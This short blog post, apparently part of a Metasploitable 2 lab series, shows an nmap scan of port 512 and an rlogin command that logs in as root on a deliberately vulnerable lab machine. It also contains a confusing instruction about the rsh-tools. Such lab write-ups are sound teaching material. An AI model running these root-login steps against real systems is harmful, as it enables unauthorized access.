Metasploitable 2: Port 512

Miguel Sampaio da Veiga
Hacker Toolbelt
Published in
1 min readMay 1, 2019

This is part VI of the Metasploitable 2 series. The previous articles were about:

  • Part I- lab setup
  • Part II — port 21
  • Part III — port 25
  • Part IV — port 80
  • Part V — port 139/445

You can follow these and later articles here.

In this part we’ll cover port 512. As always, start the MSF and open msfconsole. Begin by using nmap to determine information about out target’s open port:

>db_nmap -sV -p 512 192.168.231.109

Ports 512, 513 and 514 were left open and easily hackable.

Just make sure you do not have installed the rsh-tools and type

$ rlogin -l root 192.168.231.107

Conclusion

Nothing special about this exploit.

--

--